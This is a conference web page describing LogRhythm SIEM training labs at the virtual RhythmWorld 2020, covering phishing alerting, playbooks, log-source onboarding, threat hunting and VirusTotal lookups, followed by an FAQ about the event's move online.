In this lab you will:
- Create a GLPR
- Create a GLPR from Investigation Results
- Adjust Classification Based Data Management Settings
- Tune Events
- Filter Logs at the System Monitor Agent
Getting Started with LogRhythm Phishing Intelligence Engine (PIE)
How does a SOC respond to a phishing message? By monitoring message tracking logs in Exchange or O365 getting Phishing Email reports into LogRhythm can be quick and fully automated. Creating an Alarm for an Analyst to know when this occurs and kick-off a corresponding investigation in LogRhythm.
In this lab, you will import an Office 365 Dashboard, Simulate Office 365 Log Ingestion and create an alarm when a Phishing Email is reported
How to Utilize Playbooks
Playbooks are a powerful tool to further enable your SOC. In this lab, you will empower your SOC analysts by creating a playbook. You will also configure the Case SmartResponse Plugin to automatically attach the playbook to specific types of cases. Finally, you will set up a dashboard to monitor metrics around case statuses.
In this lab you will:
- Create a playbook
- Attach a playbook to a case
- Use SmartResponse to automatically add a playbook to a case
- Set up a case metrics dashboard
Tuning AI Engine Rules
Monitoring Your Deployment
LogRhythm has multiple built-in reports and monitoring tools that can help an Administrator determine the overall utilization of the platform and whether it is healthy. This lab will demonstrate how to utilize these tools to maintain overall health and get the most out of your LogRhythm deployment.
In this lab you will:
- Set up built-in automated reports using Report Center
- Using the Deployment Monitor
- Using the LogRhythm Diagnostics Tool
Getting Started with the LogRhythm.Tools PowerShell Module
Interacting and integrating services through REST APIs can be a challenge. LogRhythm.Tools, a Windows PowerShell module, has been developed to expand the accessibility of LogRhythm’s RESTful APIs. Through this lab you will step through some of the capabilities of this toolkit to learn how you can interact, integrate, and expand your use of LogRhythm.
In this lab you will:
- Use a new, easier, way to integrate with the LogRhythm APIs
- Create, modify, and customize LogRhythm Lists
- Trigger LogRhythm Echo Use Case
- Initiate a LogRhythm SmartResponse that utilizes LogRhythm.Tools
Onboarding a New Log Source
You have been asked to bring on a log source that is not currently supported in LogRhythm’s Knowledgebase (i.e., a custom, proprietary log source, a new product that’s not yet supported, etc.). In this lab, you will live the life of a LogRhythm administrator that is tasked with bringing on a new, unsupported log source.
In this lab you will:
- Create a new log source
- Write a quick MPE rule to begin parsing the data
- Create a new log processing policy
- Add the new MPE rule to the new processing policy
- Assign the new policy to the new log source
- Begin parsing the data
Intro to Threat Hunting – SOC 202
Your SOC team is concerned the company’s financial information may be at risk. You create a LogRhythm File Integrity Monitoring (FIM) policy that monitors files in the F:\Finance directory on a honeypot server. The FIM policy name is FinanceDataFIM.
In this lab, you will gain hands on experience in many of the techniques used by the best LogRhythm threat hunters. You will explore how to identify, qualify and investigate potential threats using the Web Console.
In this lab you will:
- Review the results of your financial data file monitoring
- Determine who was accessing the documents
- Find other actions the nefarious user took
- Find where the documents were sent
- Create a Case to document your findings
SmartResponse Plugin VirusTotal v2.1
As an Administrator, you are monitoring the LogRhythm Web Console and observe that a number of Alarms are triggering on specific IP’s, URL’s, and Domains. You want to be able to determine where this malicious content is coming from within the LogRhythm Web Console UI for follow-up action.
In this lab you will, install, configure, and execute, the VirusTotal SRP to create the following reports.
- Get Domain Report
- Get IP Report
- Get URL Report
Frequently Asked Questions (FAQs)
Why did RhythmWorld shift to a virtual event?
We are facing a truly unprecedented situation. The coronavirus pandemic has affected all our families, our businesses, our communities, and our way of life. To ensure the safety of our customers, partners, and employees we have chosen to move RhythmWorld to a virtual event. We hope that a free virtual experience will provide opportunities for our global network to learn, grow, and engage.
What is the cost to attend RhythmWorld 2020?
What technology will be required to participate in the virtual RhythmWorld?
The digital security conference will be web-based. All you need to participate is your computer and a reliable internet connection.
I’ve already registered for RhythmWorld 2020 in Denver. Will I be refunded for the in-person event?
Will I be refunded for my lost travel and accommodation costs?
Will RhythmWorld 2020 include a LogWars Capture the Flag (CTF) event?
We are planning to host an epic virtual LogWars CTF as part of RhythmWorld 2020. Details about how to register and participate will be provided closer to the event.